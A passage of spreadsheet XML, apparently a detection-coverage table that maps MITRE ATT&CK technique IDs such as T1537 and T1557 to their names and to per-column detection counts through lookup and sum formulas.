      <c r="AO52" s="16">
        <v>1</v>
      </c>
      <c r="AP52" s="394">
        <v>1</v>
      </c>
      <c r="AQ52" s="292">
        <v>0</v>
      </c>
      <c r="AR52" s="322">
        <v>0</v>
      </c>
      <c r="AS52" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT52" s="12">
        <v>0</v>
      </c>
      <c r="AU52" s="13">
        <v>0</v>
      </c>
      <c r="AV52" s="394">
        <v>0</v>
      </c>
      <c r="AW52" s="392">
        <v>14</v>
      </c>
      <c r="AX52" s="392">
        <v>1</v>
      </c>
      <c r="AY52" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (14)</v>
      </c>
      <c r="AZ52" s="4">
        <v>1</v>
      </c>
      <c r="BA52" s="16">
        <v>1</v>
      </c>
      <c r="BB52" s="394">
        <v>1</v>
      </c>
      <c r="BC52" s="292">
        <v>14</v>
      </c>
      <c r="BD52" s="322">
        <v>1</v>
      </c>
      <c r="BE52" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (14)</v>
      </c>
      <c r="BF52" s="12">
        <v>1</v>
      </c>
      <c r="BG52" s="13">
        <v>1</v>
      </c>
      <c r="BH52" s="394">
        <v>1</v>
      </c>
      <c r="BI52" s="292">
        <v>0</v>
      </c>
      <c r="BJ52" s="322">
        <v>0</v>
      </c>
      <c r="BK52" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL52" s="12">
        <v>0</v>
      </c>
      <c r="BM52" s="13">
        <v>0</v>
      </c>
      <c r="BN52" s="394">
        <v>0</v>
      </c>
      <c r="BO52" s="292">
        <v>6</v>
      </c>
      <c r="BP52" s="322">
        <v>6</v>
      </c>
      <c r="BQ52" s="322" t="str">
        <f t="shared" si="10"/>
        <v>6 (6)</v>
      </c>
      <c r="BR52" s="12">
        <v>0</v>
      </c>
      <c r="BS52" s="12">
        <v>2</v>
      </c>
      <c r="BT52" s="13">
        <v>1</v>
      </c>
      <c r="BU52" s="394">
        <v>6</v>
      </c>
      <c r="BV52" s="292">
        <v>0</v>
      </c>
      <c r="BW52" s="322">
        <v>0</v>
      </c>
      <c r="BX52" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY52" s="12">
        <v>0</v>
      </c>
      <c r="BZ52" s="13">
        <v>0</v>
      </c>
      <c r="CA52" s="394">
        <v>0</v>
      </c>
      <c r="CB52" s="292">
        <v>0</v>
      </c>
      <c r="CC52" s="322">
        <v>0</v>
      </c>
      <c r="CD52" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE52" s="12">
        <v>0</v>
      </c>
      <c r="CF52" s="12">
        <v>0</v>
      </c>
      <c r="CG52" s="13">
        <v>0</v>
      </c>
      <c r="CH52" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:86" ht="15" customHeight="1">
      <c r="A53" s="4">
        <f t="shared" si="13"/>
        <v>51</v>
      </c>
      <c r="B53" s="4" t="str">
        <f>IFERROR(VLOOKUP(A53,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1537</v>
      </c>
      <c r="C53" s="493" t="str">
        <f>IFERROR(VLOOKUP(B53,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
      <c r="D53" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B53)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E53" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>76</v>
      </c>
      <c r="F53" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (76)</v>
      </c>
      <c r="G53" s="292">
        <v>0</v>
      </c>
      <c r="H53" s="322">
        <v>0</v>
      </c>
      <c r="I53" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J53" s="12">
        <v>0</v>
      </c>
      <c r="K53" s="13">
        <v>0</v>
      </c>
      <c r="L53" s="394">
        <v>0</v>
      </c>
      <c r="M53" s="322">
        <v>0</v>
      </c>
      <c r="N53" s="322">
        <v>0</v>
      </c>
      <c r="O53" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P53" s="12">
        <v>0</v>
      </c>
      <c r="Q53" s="13">
        <v>0</v>
      </c>
      <c r="R53" s="394">
        <v>0</v>
      </c>
      <c r="S53" s="409">
        <v>0</v>
      </c>
      <c r="T53" s="4">
        <v>0</v>
      </c>
      <c r="U53" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V53" s="4">
        <v>0</v>
      </c>
      <c r="W53" s="13">
        <v>0</v>
      </c>
      <c r="X53" s="394">
        <v>0</v>
      </c>
      <c r="Y53" s="392">
        <v>3</v>
      </c>
      <c r="Z53" s="392">
        <v>3</v>
      </c>
      <c r="AA53" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (3)</v>
      </c>
      <c r="AB53" s="392">
        <v>1</v>
      </c>
      <c r="AC53" s="16">
        <v>1</v>
      </c>
      <c r="AD53" s="394">
        <v>3</v>
      </c>
      <c r="AE53" s="392">
        <v>0</v>
      </c>
      <c r="AF53" s="392">
        <v>0</v>
      </c>
      <c r="AG53" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH53" s="392">
        <v>0</v>
      </c>
      <c r="AI53" s="16">
        <v>0</v>
      </c>
      <c r="AJ53" s="394">
        <v>0</v>
      </c>
      <c r="AK53" s="392">
        <v>3</v>
      </c>
      <c r="AL53" s="392">
        <v>3</v>
      </c>
      <c r="AM53" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3 (3)</v>
      </c>
      <c r="AN53" s="392">
        <v>1</v>
      </c>
      <c r="AO53" s="16">
        <v>1</v>
      </c>
      <c r="AP53" s="394">
        <v>3</v>
      </c>
      <c r="AQ53" s="292">
        <v>0</v>
      </c>
      <c r="AR53" s="322">
        <v>0</v>
      </c>
      <c r="AS53" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT53" s="12">
        <v>0</v>
      </c>
      <c r="AU53" s="13">
        <v>0</v>
      </c>
      <c r="AV53" s="394">
        <v>0</v>
      </c>
      <c r="AW53" s="392">
        <v>0</v>
      </c>
      <c r="AX53" s="392">
        <v>0</v>
      </c>
      <c r="AY53" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ53" s="4">
        <v>0</v>
      </c>
      <c r="BA53" s="16">
        <v>0</v>
      </c>
      <c r="BB53" s="394">
        <v>0</v>
      </c>
      <c r="BC53" s="292">
        <v>0</v>
      </c>
      <c r="BD53" s="322">
        <v>0</v>
      </c>
      <c r="BE53" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF53" s="12">
        <v>0</v>
      </c>
      <c r="BG53" s="13">
        <v>0</v>
      </c>
      <c r="BH53" s="394">
        <v>0</v>
      </c>
      <c r="BI53" s="292">
        <v>0</v>
      </c>
      <c r="BJ53" s="322">
        <v>0</v>
      </c>
      <c r="BK53" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL53" s="12">
        <v>0</v>
      </c>
      <c r="BM53" s="13">
        <v>0</v>
      </c>
      <c r="BN53" s="394">
        <v>0</v>
      </c>
      <c r="BO53" s="292">
        <v>72</v>
      </c>
      <c r="BP53" s="322">
        <v>72</v>
      </c>
      <c r="BQ53" s="322" t="str">
        <f t="shared" si="10"/>
        <v>72 (72)</v>
      </c>
      <c r="BR53" s="12">
        <v>0</v>
      </c>
      <c r="BS53" s="12">
        <v>4</v>
      </c>
      <c r="BT53" s="13">
        <v>1</v>
      </c>
      <c r="BU53" s="394">
        <v>72</v>
      </c>
      <c r="BV53" s="292">
        <v>0</v>
      </c>
      <c r="BW53" s="322">
        <v>0</v>
      </c>
      <c r="BX53" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY53" s="12">
        <v>0</v>
      </c>
      <c r="BZ53" s="13">
        <v>0</v>
      </c>
      <c r="CA53" s="394">
        <v>0</v>
      </c>
      <c r="CB53" s="292">
        <v>0</v>
      </c>
      <c r="CC53" s="322">
        <v>0</v>
      </c>
      <c r="CD53" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE53" s="12">
        <v>0</v>
      </c>
      <c r="CF53" s="12">
        <v>0</v>
      </c>
      <c r="CG53" s="13">
        <v>0</v>
      </c>
      <c r="CH53" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:86" ht="15" customHeight="1">
      <c r="A54" s="4">
        <f t="shared" si="13"/>
        <v>52</v>
      </c>
      <c r="B54" s="4" t="str">
        <f>IFERROR(VLOOKUP(A54,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1542</v>
      </c>
      <c r="C54" s="493" t="str">
        <f>IFERROR(VLOOKUP(B54,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Pre-OS Boot</v>
      </c>
      <c r="D54" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B54)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E54" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F54" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (13)</v>
      </c>
      <c r="G54" s="292">
        <v>0</v>
      </c>
      <c r="H54" s="322">
        <v>0</v>
      </c>
      <c r="I54" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J54" s="12">
        <v>0</v>
      </c>
      <c r="K54" s="13">
        <v>0</v>
      </c>
      <c r="L54" s="394">
        <v>0</v>
      </c>
      <c r="M54" s="322">
        <v>98</v>
      </c>
      <c r="N54" s="322">
        <v>6</v>
      </c>
      <c r="O54" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (98)</v>
      </c>
      <c r="P54" s="12">
        <v>5</v>
      </c>
      <c r="Q54" s="13">
        <v>1</v>
      </c>
      <c r="R54" s="394">
        <v>3</v>
      </c>
      <c r="S54" s="409">
        <v>98</v>
      </c>
      <c r="T54" s="4">
        <v>6</v>
      </c>
      <c r="U54" s="322" t="str">
        <f t="shared" si="2"/>
        <v>6 (98)</v>
      </c>
      <c r="V54" s="4">
        <v>5</v>
      </c>
      <c r="W54" s="13">
        <v>1</v>
      </c>
      <c r="X54" s="394">
        <v>3</v>
      </c>
      <c r="Y54" s="392">
        <v>1681</v>
      </c>
      <c r="Z54" s="392">
        <v>15</v>
      </c>
      <c r="AA54" s="322" t="str">
        <f t="shared" si="3"/>
        <v>15 (1681)</v>
      </c>
      <c r="AB54" s="392">
        <v>14</v>
      </c>
      <c r="AC54" s="16">
        <v>1</v>
      </c>
      <c r="AD54" s="394">
        <v>4</v>
      </c>
      <c r="AE54" s="392">
        <v>3384</v>
      </c>
      <c r="AF54" s="392">
        <v>10</v>
      </c>
      <c r="AG54" s="322" t="str">
        <f t="shared" si="4"/>
        <v>10 (3384)</v>
      </c>
      <c r="AH54" s="392">
        <v>7</v>
      </c>
      <c r="AI54" s="16">
        <v>1</v>
      </c>
      <c r="AJ54" s="394">
        <v>4</v>
      </c>
      <c r="AK54" s="392">
        <v>5065</v>
      </c>
      <c r="AL54" s="392">
        <v>25</v>
      </c>
      <c r="AM54" s="322" t="str">
        <f t="shared" si="5"/>
        <v>25 (5065)</v>
      </c>
      <c r="AN54" s="392">
        <v>21</v>
      </c>
      <c r="AO54" s="16">
        <v>1</v>
      </c>
      <c r="AP54" s="394">
        <v>6</v>
      </c>
      <c r="AQ54" s="292">
        <v>0</v>
      </c>
      <c r="AR54" s="322">
        <v>0</v>
      </c>
      <c r="AS54" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT54" s="12">
        <v>0</v>
      </c>
      <c r="AU54" s="13">
        <v>0</v>
      </c>
      <c r="AV54" s="394">
        <v>0</v>
      </c>
      <c r="AW54" s="392">
        <v>6</v>
      </c>
      <c r="AX54" s="392">
        <v>3</v>
      </c>
      <c r="AY54" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (6)</v>
      </c>
      <c r="AZ54" s="4">
        <v>3</v>
      </c>
      <c r="BA54" s="16">
        <v>1</v>
      </c>
      <c r="BB54" s="394">
        <v>2</v>
      </c>
      <c r="BC54" s="292">
        <v>104</v>
      </c>
      <c r="BD54" s="322">
        <v>9</v>
      </c>
      <c r="BE54" s="322" t="str">
        <f t="shared" si="8"/>
        <v>9 (104)</v>
      </c>
      <c r="BF54" s="12">
        <v>8</v>
      </c>
      <c r="BG54" s="13">
        <v>1</v>
      </c>
      <c r="BH54" s="394">
        <v>4</v>
      </c>
      <c r="BI54" s="292">
        <v>3</v>
      </c>
      <c r="BJ54" s="322">
        <v>2</v>
      </c>
      <c r="BK54" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL54" s="12">
        <v>1</v>
      </c>
      <c r="BM54" s="13">
        <v>1</v>
      </c>
      <c r="BN54" s="394">
        <v>2</v>
      </c>
      <c r="BO54" s="292">
        <v>6</v>
      </c>
      <c r="BP54" s="322">
        <v>5</v>
      </c>
      <c r="BQ54" s="322" t="str">
        <f t="shared" si="10"/>
        <v>5 (6)</v>
      </c>
      <c r="BR54" s="12">
        <v>1</v>
      </c>
      <c r="BS54" s="12">
        <v>3</v>
      </c>
      <c r="BT54" s="13">
        <v>1</v>
      </c>
      <c r="BU54" s="394">
        <v>4</v>
      </c>
      <c r="BV54" s="292">
        <v>0</v>
      </c>
      <c r="BW54" s="322">
        <v>0</v>
      </c>
      <c r="BX54" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY54" s="12">
        <v>0</v>
      </c>
      <c r="BZ54" s="13">
        <v>0</v>
      </c>
      <c r="CA54" s="394">
        <v>0</v>
      </c>
      <c r="CB54" s="292">
        <v>2</v>
      </c>
      <c r="CC54" s="322">
        <v>2</v>
      </c>
      <c r="CD54" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE54" s="12">
        <v>0</v>
      </c>
      <c r="CF54" s="12">
        <v>1</v>
      </c>
      <c r="CG54" s="13">
        <v>1</v>
      </c>
      <c r="CH54" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="55" spans="1:86" ht="15" customHeight="1">
      <c r="A55" s="4">
        <f t="shared" si="13"/>
        <v>53</v>
      </c>
      <c r="B55" s="4" t="str">
        <f>IFERROR(VLOOKUP(A55,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1543</v>
      </c>
      <c r="C55" s="493" t="str">
        <f>IFERROR(VLOOKUP(B55,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Create or Modify System Process</v>
      </c>
      <c r="D55" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B55)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E55" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F55" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G55" s="292">
        <v>0</v>
      </c>
      <c r="H55" s="322">
        <v>0</v>
      </c>
      <c r="I55" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J55" s="12">
        <v>0</v>
      </c>
      <c r="K55" s="13">
        <v>0</v>
      </c>
      <c r="L55" s="394">
        <v>0</v>
      </c>
      <c r="M55" s="322">
        <v>4</v>
      </c>
      <c r="N55" s="322">
        <v>4</v>
      </c>
      <c r="O55" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (4)</v>
      </c>
      <c r="P55" s="12">
        <v>2</v>
      </c>
      <c r="Q55" s="13">
        <v>1</v>
      </c>
      <c r="R55" s="394">
        <v>2</v>
      </c>
      <c r="S55" s="409">
        <v>4</v>
      </c>
      <c r="T55" s="4">
        <v>4</v>
      </c>
      <c r="U55" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (4)</v>
      </c>
      <c r="V55" s="4">
        <v>2</v>
      </c>
      <c r="W55" s="13">
        <v>1</v>
      </c>
      <c r="X55" s="394">
        <v>2</v>
      </c>
      <c r="Y55" s="392">
        <v>7</v>
      </c>
      <c r="Z55" s="392">
        <v>5</v>
      </c>
      <c r="AA55" s="322" t="str">
        <f t="shared" si="3"/>
        <v>5 (7)</v>
      </c>
      <c r="AB55" s="392">
        <v>3</v>
      </c>
      <c r="AC55" s="16">
        <v>1</v>
      </c>
      <c r="AD55" s="394">
        <v>3</v>
      </c>
      <c r="AE55" s="392">
        <v>8</v>
      </c>
      <c r="AF55" s="392">
        <v>6</v>
      </c>
      <c r="AG55" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (8)</v>
      </c>
      <c r="AH55" s="392">
        <v>3</v>
      </c>
      <c r="AI55" s="16">
        <v>1</v>
      </c>
      <c r="AJ55" s="394">
        <v>2</v>
      </c>
      <c r="AK55" s="392">
        <v>15</v>
      </c>
      <c r="AL55" s="392">
        <v>11</v>
      </c>
      <c r="AM55" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (15)</v>
      </c>
      <c r="AN55" s="392">
        <v>6</v>
      </c>
      <c r="AO55" s="16">
        <v>1</v>
      </c>
      <c r="AP55" s="394">
        <v>3</v>
      </c>
      <c r="AQ55" s="292">
        <v>0</v>
      </c>
      <c r="AR55" s="322">
        <v>0</v>
      </c>
      <c r="AS55" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT55" s="12">
        <v>0</v>
      </c>
      <c r="AU55" s="13">
        <v>0</v>
      </c>
      <c r="AV55" s="394">
        <v>0</v>
      </c>
      <c r="AW55" s="392">
        <v>0</v>
      </c>
      <c r="AX55" s="392">
        <v>0</v>
      </c>
      <c r="AY55" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ55" s="4">
        <v>0</v>
      </c>
      <c r="BA55" s="16">
        <v>0</v>
      </c>
      <c r="BB55" s="394">
        <v>0</v>
      </c>
      <c r="BC55" s="292">
        <v>4</v>
      </c>
      <c r="BD55" s="322">
        <v>4</v>
      </c>
      <c r="BE55" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (4)</v>
      </c>
      <c r="BF55" s="12">
        <v>2</v>
      </c>
      <c r="BG55" s="13">
        <v>1</v>
      </c>
      <c r="BH55" s="394">
        <v>2</v>
      </c>
      <c r="BI55" s="292">
        <v>5</v>
      </c>
      <c r="BJ55" s="322">
        <v>3</v>
      </c>
      <c r="BK55" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (5)</v>
      </c>
      <c r="BL55" s="12">
        <v>2</v>
      </c>
      <c r="BM55" s="13">
        <v>1</v>
      </c>
      <c r="BN55" s="394">
        <v>2</v>
      </c>
      <c r="BO55" s="292">
        <v>5</v>
      </c>
      <c r="BP55" s="322">
        <v>3</v>
      </c>
      <c r="BQ55" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (5)</v>
      </c>
      <c r="BR55" s="12">
        <v>2</v>
      </c>
      <c r="BS55" s="12">
        <v>0</v>
      </c>
      <c r="BT55" s="13">
        <v>1</v>
      </c>
      <c r="BU55" s="394">
        <v>2</v>
      </c>
      <c r="BV55" s="292">
        <v>0</v>
      </c>
      <c r="BW55" s="322">
        <v>0</v>
      </c>
      <c r="BX55" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY55" s="12">
        <v>0</v>
      </c>
      <c r="BZ55" s="13">
        <v>0</v>
      </c>
      <c r="CA55" s="394">
        <v>0</v>
      </c>
      <c r="CB55" s="292">
        <v>0</v>
      </c>
      <c r="CC55" s="322">
        <v>0</v>
      </c>
      <c r="CD55" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE55" s="12">
        <v>0</v>
      </c>
      <c r="CF55" s="12">
        <v>0</v>
      </c>
      <c r="CG55" s="13">
        <v>0</v>
      </c>
      <c r="CH55" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:86" ht="15" customHeight="1">
      <c r="A56" s="4">
        <f t="shared" si="13"/>
        <v>54</v>
      </c>
      <c r="B56" s="4" t="str">
        <f>IFERROR(VLOOKUP(A56,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1557</v>
      </c>
      <c r="C56" s="493" t="str">
        <f>IFERROR(VLOOKUP(B56,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Adversary-in-the-Middle</v>
      </c>
      <c r="D56" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B56)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E56" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F56" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (5)</v>
      </c>
      <c r="G56" s="292">
        <v>0</v>
      </c>
      <c r="H56" s="322">
        <v>0</v>
      </c>
      <c r="I56" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J56" s="12">
        <v>0</v>
      </c>
      <c r="K56" s="13">
        <v>0</v>
      </c>
      <c r="L56" s="394">
        <v>0</v>
      </c>
      <c r="M56" s="322">
        <v>0</v>
      </c>
      <c r="N56" s="322">
        <v>0</v>
      </c>
      <c r="O56" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P56" s="12">
        <v>0</v>
      </c>
      <c r="Q56" s="13">
        <v>0</v>
      </c>
      <c r="R56" s="394">
        <v>0</v>
      </c>
      <c r="S56" s="409">
        <v>0</v>
      </c>
      <c r="T56" s="4">
        <v>0</v>
      </c>
      <c r="U56" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V56" s="4">
        <v>0</v>
      </c>
      <c r="W56" s="13">
        <v>0</v>
      </c>
      <c r="X56" s="394">
        <v>0</v>
      </c>
      <c r="Y56" s="392">
        <v>2</v>
      </c>
      <c r="Z56" s="392">
        <v>1</v>
      </c>
      <c r="AA56" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (2)</v>
      </c>
      <c r="AB56" s="392">
        <v>1</v>
      </c>
      <c r="AC56" s="16">
        <v>1</v>
      </c>
      <c r="AD56" s="394">
        <v>1</v>
      </c>
      <c r="AE56" s="392">
        <v>0</v>
      </c>
      <c r="AF56" s="392">
        <v>0</v>
      </c>
      <c r="AG56" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH56" s="392">
        <v>0</v>
      </c>
      <c r="AI56" s="16">
        <v>0</v>
      </c>
      <c r="AJ56" s="394">
        <v>0</v>
      </c>
      <c r="AK56" s="392">
        <v>2</v>
      </c>
      <c r="AL56" s="392">
        <v>1</v>
      </c>
      <c r="AM56" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (2)</v>
      </c>
      <c r="AN56" s="392">
        <v>1</v>
      </c>
      <c r="AO56" s="16">
        <v>1</v>
      </c>
      <c r="AP56" s="394">
        <v>1</v>
      </c>
      <c r="AQ56" s="292">
        <v>0</v>
      </c>
      <c r="AR56" s="322">
        <v>0</v>
      </c>
      <c r="AS56" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT56" s="12">
        <v>0</v>
      </c>
      <c r="AU56" s="13">
        <v>0</v>
      </c>
      <c r="AV56" s="394">
        <v>0</v>
      </c>
      <c r="AW56" s="392">
        <v>0</v>
      </c>
      <c r="AX56" s="392">
        <v>0</v>
      </c>
      <c r="AY56" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ56" s="4">
        <v>0</v>
      </c>
      <c r="BA56" s="16">
        <v>0</v>
      </c>
      <c r="BB56" s="394">
        <v>0</v>
      </c>
      <c r="BC56" s="292">
        <v>0</v>
      </c>
      <c r="BD56" s="322">
        <v>0</v>
      </c>
      <c r="BE56" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF56" s="12">
        <v>0</v>
      </c>
      <c r="BG56" s="13">
        <v>0</v>
      </c>
      <c r="BH56" s="394">
        <v>0</v>
      </c>
      <c r="BI56" s="292">
        <v>0</v>
      </c>
      <c r="BJ56" s="322">
        <v>0</v>
      </c>
      <c r="BK56" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL56" s="12">
        <v>0</v>
      </c>
      <c r="BM56" s="13">
        <v>0</v>
      </c>
      <c r="BN56" s="394">
        <v>0</v>
      </c>
      <c r="BO56" s="292">
        <v>6</v>
      </c>
      <c r="BP56" s="322">
        <v>6</v>
      </c>
      <c r="BQ56" s="322" t="str">
        <f t="shared" si="10"/>
        <v>6 (6)</v>
      </c>
      <c r="BR56" s="12">
        <v>0</v>
      </c>
      <c r="BS56" s="12">
        <v>4</v>
      </c>
      <c r="BT56" s="13">
        <v>1</v>
      </c>
      <c r="BU56" s="394">
        <v>5</v>
      </c>
      <c r="BV56" s="292">
        <v>0</v>
      </c>
      <c r="BW56" s="322">
        <v>0</v>
      </c>
      <c r="BX56" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY56" s="12">
        <v>0</v>
      </c>
      <c r="BZ56" s="13">
        <v>0</v>
      </c>
      <c r="CA56" s="394">
        <v>0</v>
      </c>
      <c r="CB56" s="292">
        <v>0</v>
      </c>
      <c r="CC56" s="322">
        <v>0</v>
      </c>
      <c r="CD56" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE56" s="12">
        <v>0</v>
      </c>
      <c r="CF56" s="12">
        <v>0</v>
      </c>
      <c r="CG56" s="13">
        <v>0</v>
      </c>
      <c r="CH56" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:86" ht="15" customHeight="1">
      <c r="A57" s="4">
        <f t="shared" si="13"/>
        <v>55</v>
      </c>
      <c r="B57" s="4" t="str">
        <f>IFERROR(VLOOKUP(A57,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1563</v>
      </c>
      <c r="C57" s="493" t="str">
        <f>IFERROR(VLOOKUP(B57,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Service Session Hijacking</v>
      </c>
      <c r="D57" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B57)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E57" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B57,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>97</v>
      </c>
      <c r="F57" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (97)</v>
      </c>
      <c r="G57" s="292">
        <v>0</v>
      </c>
      <c r="H57" s="322">
        <v>0</v>
      </c>
      <c r="I57" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J57" s="12">
        <v>0</v>
      </c>
      <c r="K57" s="13">
        <v>0</v>
      </c>
      <c r="L57" s="394">
        <v>0</v>
      </c>
      <c r="M57" s="322">
        <v>0</v>
      </c>
      <c r="N57" s="322">
        <v>0</v>
      </c>
      <c r="O57" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P57" s="12">
        <v>0</v>
      </c>
      <c r="Q57" s="13">
        <v>0</v>
      </c>
      <c r="R57" s="394">
        <v>0</v>
      </c>
      <c r="S57" s="409">
        <v>0</v>
      </c>
      <c r="T57" s="4">
        <v>0</v>
      </c>
      <c r="U57" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V57" s="4">
        <v>0</v>
      </c>
      <c r="W57" s="13">
        <v>0</v>
      </c>
      <c r="X57" s="394">
        <v>0</v>
      </c>
      <c r="Y57" s="392">
        <v>6</v>
      </c>
      <c r="Z57" s="392">
        <v>6</v>
      </c>
      <c r="AA57" s="322" t="str">
        <f t="shared" si="3"/>
        <v>6 (6)</v>
      </c>
